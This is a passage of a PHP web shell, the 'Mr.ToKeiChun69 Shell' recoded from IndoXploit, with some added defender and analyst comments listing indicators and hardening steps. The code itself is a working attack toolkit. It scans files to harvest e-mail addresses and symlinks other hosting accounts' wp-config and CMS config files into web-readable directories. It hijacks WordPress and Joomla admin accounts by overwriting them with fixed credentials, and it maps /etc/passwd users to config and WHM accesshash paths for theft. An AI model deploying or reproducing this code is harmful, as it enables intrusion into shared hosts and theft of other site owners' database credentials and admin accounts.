  1232. else if (is_file($source) === true)
  1233. {
  1234. $zip->addFromString(basename($source), file_get_contents($source));
  1235. }
  1236. }
  1237.  
  1238. return $zip->close();
  1239. }
  1240. }
  1241.  
  1242. return false;
  1243. }
  1244. Zip($_POST['dir'],$save);
  1245. echo "Done , Save To <b>$save</b>";
  1246. }
  1247. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1248. if($_POST['extrak']){
  1249. $save=$_POST['save'];
  1250. $zip = new ZipArchive;
  1251. $res = $zip->open($_POST['dir']);
  1252. if ($res === TRUE) {
  1253. $zip->extractTo($save);
  1254. $zip->close();
  1255. echo 'Succes , Location : <b>'.$save.'</b>';
  1256. } else {
  1257. echo 'Gagal Mas :( Ntahlah !';
  1258. }
  1259. }
  1260. echo '</tr></table>';
  1261. } elseif($_GET['do'] == 'loghunter')
  1262. {
  1263. echo '<center><h2>Log Hunter</h2></center>';
  1264. echo "<Center>\n";
  1265. echo "<form action=\"\" method=\"post\">\n";
  1266. ?><br>Dir :<input type="text" value="<?=getcwd();?>" name="shc_dir"><?php
  1267. echo "<input type=\"submit\" name=\"submit\" class=\"kotak\" value=\"Scan Now!\"/>\n";
  1268. echo "</form>\n";
  1269. echo "<pre style=\"text-align: left;\">\n";
  1270. error_reporting(0);
  1271. /*
  1272. Name : Log Hunter (Grab Email)
  1273. Date : 26/03/2016 05:53 PM
  1274. Link : http://facebook.com/bug7sec
  1275. Link : http://pastebin.com/u/shor7cut
  1276. Author : Shor7cut
  1277. */
  1278.  
  1279.  
  1280. if($_POST['submit']){
  // Recursively walks $shcdirs and prints one tagged line per finding for each regular file
  // whose path does not contain "css" (case-insensitive). Tags printed:
  //   Stegano  - EXIF COMPUTED/UserComment is set, or the file text contains "exif_read_data"
  //   Uploader - file text contains "tmp_name"
  //   Base64   - file text contains "base64_decode"
  //   MailFunc - file text contains "mail" followed by ' or (
  //   Javascript - the path contains "js"
  //   SendMail - one line per syntactically valid e-mail address found in the file
  // Defender note: the function is called with $_POST['shc_dir'], reads every matching file in
  // full, and so enumerates other scripts and harvests e-mail addresses from the host. It relies
  // on eregi(), which was removed in PHP 7.0, so this code path dates from PHP 5-era stacks.
  1281. function tampilkan($shcdirs){
  1282. foreach(scandir($shcdirs) as $shc)
  1283. {
  1284. if($shc!='.' && $shc!='..')
  1285. {
  1286. $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  1287. if( !is_dir($shc) && !eregi("css", $shc) ){
  1288.  
  // Whole file is loaded; EXIF is read regardless of file type.
  1289. $fgt = file_get_contents($shc);
  1290. $ifgt = exif_read_data($shc);
  1291. $jembut = "COMPUTED";
  1292. $taik = "UserComment";
  1293. $shcm = "/mail['(']/";
  1294. if($ifgt[$jembut][$taik]){
  1295. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  1296. }
  // Collect every substring that looks like an e-mail address; validated further below.
  1297. preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  1298. $hcs = "/base64_decode/";
  1299. $exif = "/exif_read_data/";
  1300. preg_match($shcm, addslashes($fgt), $mailshc);
  1301. preg_match($hcs, addslashes($fgt), $shcmar);
  1302. preg_match($exif, addslashes($fgt), $shcxif);
  // This condition has an empty body: nothing is reported for cookie files or PHP warning logs.
  1303. if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  1304. }
  1305. if(eregi('tmp_name', $fgt)){
  1306. echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  1307. }
  1308. if($shcmar[0]){
  1309. echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  1310. }
  1311. if($mailshc[0]){
  1312. echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  1313. }
  1314. if($shcxif[0]){
  1315. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  1316. }
  1317. if(eregi("js", $shc)){
  1318. echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  1319. }
  1320. if($cocok[0]){
  1321. foreach ($cocok[0] as $key => $shcmail) {
  1322. if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  1323. echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  1324. }
  1325. }
  1326. }
  1327.  
  // Directories (and any path containing "css") take this branch and are recursed into.
  1328. }else{
  1329. tampilkan($shc);
  1330. }
  1331. }
  1332. }
  1333. }
  1334. tampilkan($_POST['shc_dir']);
  1335. }
  1336. echo "</pre>\n";
  1337. echo "</Center>\n";}
  1338. elseif($_GET['do'] == 'metu') {
  1339.  
  1340.  
  1341. echo '<form action="?dir=$dir&do=metu" method="post">';
  1342. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1343. echo 'Byee !';
  1344.  
  1345. }
  1346. elseif($_GET['do'] == 'about') {
  1347.  
  1348. echo '<center>Mr.ToKeiChun69 Shell<hr>IndoXploit Shell Recoded By Mr.ToKeiChun59<br><a href="https://www.facebook.com/tokeichun.sh">Here</a>';
  1349. }
  1350. elseif($_GET['do'] == 'symlink404') {
  // Defender note: this branch exposes a file outside the current site as plain text through Apache.
  // It recreates a world-writable 'sym404' directory, links the POSTed target path into it, and
  // drops an .htaccess that enables Indexes/FollowSymLinks and maps .php to text/plain.
  // Indicators visible here: a 'sym404' directory, symlinks pointing outside the docroot, and an
  // .htaccess containing 'AddType text/plain .php'. Hardening that blocks this class of abuse:
  // SymLinksIfOwnerMatch instead of FollowSymLinks, an AllowOverride policy that does not let
  // .htaccess change Options/FileInfo, and PHP open_basedir / disable_functions restrictions.
  1351. echo "<center>
  1352. <form method='post'>
  1353. <br>File Target: <input type='text' name='dir' size='50' value='/home/user/public_html/wp-config.php'>
  1354. <br>Save As: <input type='text' name='jnck' size='50' value='config404.txt'><br><input name='sym404' type='submit' value='Eksekusi Gan'></form><br>";
  1355. @error_reporting(0);
  1356. @ini_set('display_errors', 0);
  1357. if($_POST['sym404']){
  1358. rmdir("sym404");mkdir("sym404", 0777);
  1359. $dir = $_POST['dir'];
  1360. $jnck = $_POST['jnck'];
  // The link is attempted twice: via a shell command built by string concatenation from the
  // unescaped POST values, and via PHP's symlink(). Neither result is checked.
  1361. system("ln -s ".$dir." sym404/".$jnck);
  1362. symlink($dir,"sym404/".$jnck);
  // The .htaccess handle is written but never closed explicitly in this branch.
  1363. $inija = fopen("sym404/.htaccess", "w");
  1364. fwrite($inija,"Options Indexes FollowSymLinks
  1365. DirectoryIndex tokeichun.html
  1366. AddType text/plain .php
  1367. AddHandler text/plain .php
  1368. Satisfy Any
  1369.  
  1370. ReadmeName ".$jnck);
  1371. echo'<a href="sym404/">Succes! >:(</a>';
  1372. }
  1373.  
  1374. }
  1375. elseif($_GET['do'] == 'auto_cu_wp') {
  1376. if($_POST['gass']) {
  1377. echo "<center><h1>WordPress Auto Change User 2</h1>
  1378. <form method='post'>
  1379. Link Config: <br>
  1380. <textarea name='link' style='width: 450px; height:250px;'>";
  1381. UrlLoop($_POST['linkconf'],'wordpress');
  1382. echo"</textarea><br>
  1383. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1384. </form></center>";
  1385. } else {
  1386. echo "<center><h1>WordPress Auto Change User 2</h1>
  1387. <form method='post'>
  1388. Link Config: <br>
  1389. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1390. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1391. </form></center>";
  1392. }
  1393. if($_POST['auto_cu_wp']) {
  1394.  
  // Fetches the URL in $sites with cURL and returns the response body (curl_exec() result).
  // Redirects are followed, the connect timeout is 5 seconds, and a fixed Firefox 32 User-Agent is sent.
  // Defender note: TLS peer and host verification are both disabled, and cookies are persisted to
  // 'cookie.txt' in the working directory. That file and the hard-coded User-Agent string are
  // artifacts to look for on disk and in outbound proxy logs.
  1395. function anucurl($sites) {
  1396. $ch = curl_init($sites);
  1397. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1398. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1399. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1400. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1401. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1402. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1403. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1404. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1405. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1406. $data = curl_exec($ch);
  1407. curl_close($ch);
  1408. return $data;
  1409. }
  1410. $link = explode("\r\n", $_POST['link']);
  1411. $user = "root@1337";
  1412. $pass = "root@1337";
  1413. $passx = md5($pass);
  1414. foreach($link as $dir_config) {
  1415. $config = anucurl($dir_config);
  1416. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1417. $dbuser = ambilkata($config,"DB_USER', '","'");
  1418. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1419. $dbname = ambilkata($config,"DB_NAME', '","'");
  1420. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1421. $prefix = $dbprefix."users";
  1422. $option = $dbprefix."options";
  1423. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1424. $db = mysql_select_db($dbname);
  1425. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1426. $result = mysql_fetch_array($q);
  1427. $id = $result[ID];
  1428. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1429. $result2 = mysql_fetch_array($q2);
  1430. $target = $result2[option_value];
  1431. if($target == '') {
  1432. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1433. } else {
  1434. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1435. }
  1436. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1437. if(!$conn OR !$db OR !$update) {
  1438. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1439. mysql_close($conn);
  1440. } else {
  1441. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1442. echo "[+] username: <font color=lime>$user</font><br>";
  1443. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1444.  
  1445. mysql_close($conn);
  1446. }
  1447. }
  1448. }
  1449.  
  1450. }
  1451. elseif($_GET['do'] == 'auto_cu_joomla') {
  1452. if($_POST['gass']) {
  1453. echo "<center><h1>Joomla Auto Change User 2</h1>
  1454. <form method='post'>
  1455. Link Config: <br>
  1456. <textarea name='link' style='width: 450px; height:250px;'>";
  1457. UrlLoop($_POST['linkconf'],'joomla');
  1458. echo"</textarea><br>
  1459. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1460. </form></center>";
  1461. } else {
  1462. echo "<center><h1>Joomla Auto Change User 2</h1>
  1463. <form method='post'>
  1464. Link Config: <br>
  1465. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1466. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1467. </form></center>";
  1468. }
  1469. if($_POST['auto_cu_joomla']) {
  1470.  
  // Fetches the URL in $sites with cURL and returns the response body (curl_exec() result).
  // This definition is identical to the one in the 'auto_cu_wp' branch; each is declared only when
  // its own branch runs.
  // Defender note: TLS peer and host verification are both disabled, redirects are followed, and
  // cookies are persisted to 'cookie.txt' in the working directory. That file and the hard-coded
  // User-Agent string are artifacts to look for on disk and in outbound proxy logs.
  1471. function anucurl($sites) {
  1472. $ch = curl_init($sites);
  1473. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1474. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1475. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1476. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1477. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1478. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1479. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1480. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1481. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1482. $data = curl_exec($ch);
  1483. curl_close($ch);
  1484. return $data;
  1485. }
  1486. $link = explode("\r\n", $_POST['link']);
  1487. $user = "root@1337";
  1488. $pass = "root@1337";
  1489. $passx = md5($pass);
  1490. foreach($link as $dir_config) {
  1491. $config = anucurl($dir_config);
  1492. $dbhost = ambilkata($config,"host = '","'");
  1493. $dbuser = ambilkata($config,"user = '","'");
  1494. $dbpass = ambilkata($config,"password = '","'");
  1495. $dbname = ambilkata($config,"db = '","'");
  1496. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1497. $prefix = $dbprefix."users";
  1498. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1499. $db = mysql_select_db($dbname);
  1500. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1501. $result = mysql_fetch_array($q);
  1502. $id = $result['id'];
  1503. $site = ambilkata($config,"sitename = '","'");
  1504. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1505. echo "Config => ".$dir_config."<br>";
  1506. echo "CMS => Joomla<br>";
  1507. if($site == '') {
  1508. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1509. } else {
  1510. echo "Sitename => $site<br>";
  1511. }
  1512. if(!$update OR !$conn OR !$db) {
  1513. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1514. } else {
  1515. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1516. }
  1517. mysql_close($conn);
  1518. }
  1519. }
  1520. } elseif($_GET['config'] == 'grabber') {
  1521. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1522. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1523. exit;
  1524. }
  1525. if($_POST){ if($_POST['config'] == 'symvhosts') {
  1526. @mkdir("symvhosts", 0777);
  1527. exe("ln -s / symvhosts/root");
  1528. $htaccess="Options Indexes FollowSymLinks
  1529. DirectoryIndex tokeichun69.htm
  1530. AddType text/plain .php
  1531. AddHandler text/plain .php
  1532. Satisfy Any";
  1533. @file_put_contents("symvhosts/.htaccess",$htaccess);
  1534. $etc_passwd=$_POST['passwd'];
  1535.  
  1536. $etc_passwd=explode("\n",$etc_passwd);
  1537. foreach($etc_passwd as $passwd){
  1538. $pawd=explode(":",$passwd);
  1539. $user =$pawd[5];
  1540. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1541. if (preg_match('/vhosts/i',$user)){
  1542. exe("ln -s ".$user."/httpdocs/wp-config.php symvhosts/".$jembod."-Wordpress.txt");
  1543. exe("ln -s ".$user."/httpdocs/configuration.php symvhosts/".$jembod."-Joomla.txt");
  1544. exe("ln -s ".$user."/httpdocs/config/koneksi.php symvhosts/".$jembod."-Lokomedia.txt");
  1545. exe("ln -s ".$user."/httpdocs/forum/config.php symvhosts/".$jembod."-phpBB.txt");
  1546. exe("ln -s ".$user."/httpdocs/sites/default/settings.php symvhosts/".$jembod."-Drupal.txt");
  1547. exe("ln -s ".$user."/httpdocs/config/settings.inc.php symvhosts/".$jembod."-PrestaShop.txt");
  1548. exe("ln -s ".$user."/httpdocs/app/etc/local.xml symvhosts/".$jembod."-Magento.txt");
  1549. exe("ln -s ".$user."/httpdocs/admin/config.php symvhosts/".$jembod."-OpenCart.txt");
  1550. exe("ln -s ".$user."/httpdocs/application/config/database.php symvhosts/".$jembod."-Ellislab.txt");
  1551. }}}
  1552. if($_POST['config'] == 'symlink') {
  1553. @mkdir("symconfig", 0777);
  1554. @symlink("/","symconfig/root");
  1555. $htaccess="Options Indexes FollowSymLinks
  1556. DirectoryIndex tokeichun69.htm
  1557. AddType text/plain .php
  1558. AddHandler text/plain .php
  1559. Satisfy Any";
  1560. @file_put_contents("symconfig/.htaccess",$htaccess);}
  // Analyst note: staging step for the "404" mode. Same layout as the "symlink"
  // mode but under a directory named "sym404": a root symlink plus an .htaccess
  // written into the script's current working directory. Errors are suppressed with @.
  1561. if($_POST['config'] == '404') {
  1562. @mkdir("sym404", 0777);
  // Links the filesystem root into the web-reachable directory as "sym404/root".
  1563. @symlink("/","sym404/root");
  // Besides listings, symlink following and the text/plain mapping for .php, this
  // .htaccess body sets auto-index display options, hides entries matching
  // *.txt404 from the listing, and carries a rewrite rule that matches request
  // paths ending in .txt inside sym404 and points them at the same URI with "404"
  // appended (the per-file *.txt404 directories are created later in the loop).
  1564. $htaccess="Options Indexes FollowSymLinks
  1565. DirectoryIndex tokeichun69.htm
  1566. AddType text/plain .php
  1567. AddHandler text/plain .php
  1568. Satisfy Any
  1569. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1570. IndexIgnore *.txt404
  1571. RewriteEngine On
  1572. RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC]
  1573. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  // Detection: a "sym404" directory with a "root" -> "/" symlink, sub-directories
  // whose names end in ".txt404", and an .htaccess containing the directives above.
  // Mitigation: restrict AllowOverride for tenant directories and use
  // SymLinksIfOwnerMatch so links to files owned by other accounts are not followed.
  1574. @file_put_contents("sym404/.htaccess",$htaccess);
  1575. }
  // Analyst note: staging step for the "grab" mode, which stores copies of other
  // accounts' configuration files rather than symlinks to them.
  1576. if($_POST['config'] == 'grab') {
  // Output directory for the copied files; mode 0777 is requested.
  1577. mkdir("configg", 0777);
  // .htaccess body written into that directory: "Options all", "Require None",
  // "Satisfy Any", i.e. directives aimed at keeping the directory reachable over HTTP.
  1578. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1579. $htc = fopen("configg/.htaccess","w");
  // Detection: a "configg" directory in a web root containing this .htaccess and
  // files named "<account>-<CMS label>.txt" (written by the loop that follows).
  1580. fwrite($htc, $isi_htc);
  1581. }
  1582. $passwd = $_POST['passwd'];
  1583.  
  1584. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1585. foreach($user_config[1] as $user_tokeichun) {
  1586. $grab_config = array(
  1587. "/home/$user_tokeichun/.accesshash" => "WHM-accesshash",
  1588. "/home/$user_tokeichun/public_html/config/koneksi.php" => "Lokomedia",
  1589. "/home/$user_tokeichun/public_html/forum/config.php" => "phpBB",
  1590. "/home/$user_tokeichun/public_html/sites/default/settings.php" => "Drupal",
  1591. "/home/$user_tokeichun/public_html/config/settings.inc.php" => "PrestaShop",
  1592. "/home/$user_tokeichun/public_html/app/etc/local.xml" => "Magento",
  1593. "/home/$user_tokeichun/public_html/admin/config.php" => "OpenCart",
  1594. "/home/$user_tokeichun/public_html/application/config/database.php" => "Ellislab",
  1595. "/home/$user_tokeichun/public_html/vb/includes/config.php" => "Vbulletin",
  1596. "/home/$user_tokeichun/public_html/includes/config.php" => "Vbulletin",
  1597. "/home/$user_tokeichun/public_html/forum/includes/config.php" => "Vbulletin",
  1598. "/home/$user_tokeichun/public_html/forums/includes/config.php" => "Vbulletin",
  1599. "/home/$user_tokeichun/public_html/cc/includes/config.php" => "Vbulletin",
  1600. "/home/$user_tokeichun/public_html/inc/config.php" => "MyBB",
  1601. "/home/$user_tokeichun/public_html/includes/configure.php" => "OsCommerce",
  1602. "/home/$user_tokeichun/public_html/shop/includes/configure.php" => "OsCommerce",
  1603. "/home/$user_tokeichun/public_html/os/includes/configure.php" => "OsCommerce",
  1604. "/home/$user_tokeichun/public_html/oscom/includes/configure.php" => "OsCommerce",
  1605. "/home/$user_tokeichun/public_html/products/includes/configure.php" => "OsCommerce",
  1606. "/home/$user_tokeichun/public_html/cart/includes/configure.php" => "OsCommerce",
  1607. "/home/$user_tokeichun/public_html/inc/conf_global.php" => "IPB",
  1608. "/home/$user_tokeichun/public_html/wp-config.php" => "Wordpress",
  1609. "/home/$user_tokeichun/public_html/wp/test/wp-config.php" => "Wordpress",
  1610. "/home/$user_tokeichun/public_html/blog/wp-config.php" => "Wordpress",
  1611. "/home/$user_tokeichun/public_html/beta/wp-config.php" => "Wordpress",
  1612. "/home/$user_tokeichun/public_html/portal/wp-config.php" => "Wordpress",
  1613. "/home/$user_tokeichun/public_html/site/wp-config.php" => "Wordpress",
  1614. "/home/$user_tokeichun/public_html/wp/wp-config.php" => "Wordpress",
  1615. "/home/$user_tokeichun/public_html/WP/wp-config.php" => "Wordpress",
  1616. "/home/$user_tokeichun/public_html/news/wp-config.php" => "Wordpress",
  1617. "/home/$user_tokeichun/public_html/wordpress/wp-config.php" => "Wordpress",
  1618. "/home/$user_tokeichun/public_html/test/wp-config.php" => "Wordpress",
  1619. "/home/$user_tokeichun/public_html/demo/wp-config.php" => "Wordpress",
  1620. "/home/$user_tokeichun/public_html/home/wp-config.php" => "Wordpress",
  1621. "/home/$user_tokeichun/public_html/v1/wp-config.php" => "Wordpress",
  1622. "/home/$user_tokeichun/public_html/v2/wp-config.php" => "Wordpress",
  1623. "/home/$user_tokeichun/public_html/press/wp-config.php" => "Wordpress",
  1624. "/home/$user_tokeichun/public_html/new/wp-config.php" => "Wordpress",
  1625. "/home/$user_tokeichun/public_html/blogs/wp-config.php" => "Wordpress",
  1626. "/home/$user_tokeichun/public_html/configuration.php" => "Joomla",
  1627. "/home/$user_tokeichun/public_html/blog/configuration.php" => "Joomla",
  1628. "/home/$user_tokeichun/public_html/submitticket.php" => "^WHMCS",
  1629. "/home/$user_tokeichun/public_html/cms/configuration.php" => "Joomla",
  1630. "/home/$user_tokeichun/public_html/beta/configuration.php" => "Joomla",
  1631. "/home/$user_tokeichun/public_html/portal/configuration.php" => "Joomla",
  1632. "/home/$user_tokeichun/public_html/site/configuration.php" => "Joomla",
  1633. "/home/$user_tokeichun/public_html/main/configuration.php" => "Joomla",
  1634. "/home/$user_tokeichun/public_html/home/configuration.php" => "Joomla",
  1635. "/home/$user_tokeichun/public_html/demo/configuration.php" => "Joomla",
  1636. "/home/$user_tokeichun/public_html/test/configuration.php" => "Joomla",
  1637. "/home/$user_tokeichun/public_html/v1/configuration.php" => "Joomla",
  1638. "/home/$user_tokeichun/public_html/v2/configuration.php" => "Joomla",
  1639. "/home/$user_tokeichun/public_html/joomla/configuration.php" => "Joomla",
  1640. "/home/$user_tokeichun/public_html/new/configuration.php" => "Joomla",
  1641. "/home/$user_tokeichun/public_html/WHMCS/submitticket.php" => "WHMCS",
  1642. "/home/$user_tokeichun/public_html/whmcs1/submitticket.php" => "WHMCS",
  1643. "/home/$user_tokeichun/public_html/Whmcs/submitticket.php" => "WHMCS",
  1644. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1645. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1646. "/home/$user_tokeichun/public_html/WHMC/submitticket.php" => "WHMCS",
  1647. "/home/$user_tokeichun/public_html/Whmc/submitticket.php" => "WHMCS",
  1648. "/home/$user_tokeichun/public_html/whmc/submitticket.php" => "WHMCS",
  1649. "/home/$user_tokeichun/public_html/WHM/submitticket.php" => "WHMCS",
  1650. "/home/$user_tokeichun/public_html/Whm/submitticket.php" => "WHMCS",
  1651. "/home/$user_tokeichun/public_html/whm/submitticket.php" => "WHMCS",
  1652. "/home/$user_tokeichun/public_html/HOST/submitticket.php" => "WHMCS",
  1653. "/home/$user_tokeichun/public_html/Host/submitticket.php" => "WHMCS",
  1654. "/home/$user_tokeichun/public_html/host/submitticket.php" => "WHMCS",
  1655. "/home/$user_tokeichun/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1656. "/home/$user_tokeichun/public_html/Supportes/submitticket.php" => "WHMCS",
  1657. "/home/$user_tokeichun/public_html/supportes/submitticket.php" => "WHMCS",
  1658. "/home/$user_tokeichun/public_html/domains/submitticket.php" => "WHMCS",
  1659. "/home/$user_tokeichun/public_html/domain/submitticket.php" => "WHMCS",
  1660. "/home/$user_tokeichun/public_html/Hosting/submitticket.php" => "WHMCS",
  1661. "/home/$user_tokeichun/public_html/HOSTING/submitticket.php" => "WHMCS",
  1662. "/home/$user_tokeichun/public_html/hosting/submitticket.php" => "WHMCS",
  1663. "/home/$user_tokeichun/public_html/CART/submitticket.php" => "WHMCS",
  1664. "/home/$user_tokeichun/public_html/Cart/submitticket.php" => "WHMCS",
  1665. "/home/$user_tokeichun/public_html/cart/submitticket.php" => "WHMCS",
  1666. "/home/$user_tokeichun/public_html/ORDER/submitticket.php" => "WHMCS",
  1667. "/home/$user_tokeichun/public_html/Order/submitticket.php" => "WHMCS",
  1668. "/home/$user_tokeichun/public_html/order/submitticket.php" => "WHMCS",
  1669. "/home/$user_tokeichun/public_html/CLIENT/submitticket.php" => "WHMCS",
  1670. "/home/$user_tokeichun/public_html/Client/submitticket.php" => "WHMCS",
  1671. "/home/$user_tokeichun/public_html/client/submitticket.php" => "WHMCS",
  1672. "/home/$user_tokeichun/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1673. "/home/$user_tokeichun/public_html/Clientarea/submitticket.php" => "WHMCS",
  1674. "/home/$user_tokeichun/public_html/clientarea/submitticket.php" => "WHMCS",
  1675. "/home/$user_tokeichun/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1676. "/home/$user_tokeichun/public_html/Support/submitticket.php" => "WHMCS",
  1677. "/home/$user_tokeichun/public_html/support/submitticket.php" => "WHMCS",
  1678. "/home/$user_tokeichun/public_html/BILLING/submitticket.php" => "WHMCS",
  1679. "/home/$user_tokeichun/public_html/Billing/submitticket.php" => "WHMCS",
  1680. "/home/$user_tokeichun/public_html/billing/submitticket.php" => "WHMCS",
  1681. "/home/$user_tokeichun/public_html/BUY/submitticket.php" => "WHMCS",
  1682. "/home/$user_tokeichun/public_html/Buy/submitticket.php" => "WHMCS",
  1683. "/home/$user_tokeichun/public_html/buy/submitticket.php" => "WHMCS",
  1684. "/home/$user_tokeichun/public_html/MANAGE/submitticket.php" => "WHMCS",
  1685. "/home/$user_tokeichun/public_html/Manage/submitticket.php" => "WHMCS",
  1686. "/home/$user_tokeichun/public_html/manage/submitticket.php" => "WHMCS",
  1687. "/home/$user_tokeichun/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1688. "/home/$user_tokeichun/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1689. "/home/$user_tokeichun/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1690. "/home/$user_tokeichun/public_html/clientsupport/submitticket.php" => "WHMCS",
  1691. "/home/$user_tokeichun/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1692. "/home/$user_tokeichun/public_html/Checkout/submitticket.php" => "WHMCS",
  1693. "/home/$user_tokeichun/public_html/checkout/submitticket.php" => "WHMCS",
  1694. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1695. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1696. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1697. "/home/$user_tokeichun/public_html/BASKET/submitticket.php" => "WHMCS",
  1698. "/home/$user_tokeichun/public_html/Basket/submitticket.php" => "WHMCS",
  1699. "/home/$user_tokeichun/public_html/basket/submitticket.php" => "WHMCS",
  1700. "/home/$user_tokeichun/public_html/SECURE/submitticket.php" => "WHMCS",
  1701. "/home/$user_tokeichun/public_html/Secure/submitticket.php" => "WHMCS",
  1702. "/home/$user_tokeichun/public_html/secure/submitticket.php" => "WHMCS",
  1703. "/home/$user_tokeichun/public_html/SALES/submitticket.php" => "WHMCS",
  1704. "/home/$user_tokeichun/public_html/Sales/submitticket.php" => "WHMCS",
  1705. "/home/$user_tokeichun/public_html/sales/submitticket.php" => "WHMCS",
  1706. "/home/$user_tokeichun/public_html/BILL/submitticket.php" => "WHMCS",
  1707. "/home/$user_tokeichun/public_html/Bill/submitticket.php" => "WHMCS",
  1708. "/home/$user_tokeichun/public_html/bill/submitticket.php" => "WHMCS",
  1709. "/home/$user_tokeichun/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1710. "/home/$user_tokeichun/public_html/Purchase/submitticket.php" => "WHMCS",
  1711. "/home/$user_tokeichun/public_html/purchase/submitticket.php" => "WHMCS",
  1712. "/home/$user_tokeichun/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1713. "/home/$user_tokeichun/public_html/Account/submitticket.php" => "WHMCS",
  1714. "/home/$user_tokeichun/public_html/account/submitticket.php" => "WHMCS",
  1715. "/home/$user_tokeichun/public_html/USER/submitticket.php" => "WHMCS",
  1716. "/home/$user_tokeichun/public_html/User/submitticket.php" => "WHMCS",
  1717. "/home/$user_tokeichun/public_html/user/submitticket.php" => "WHMCS",
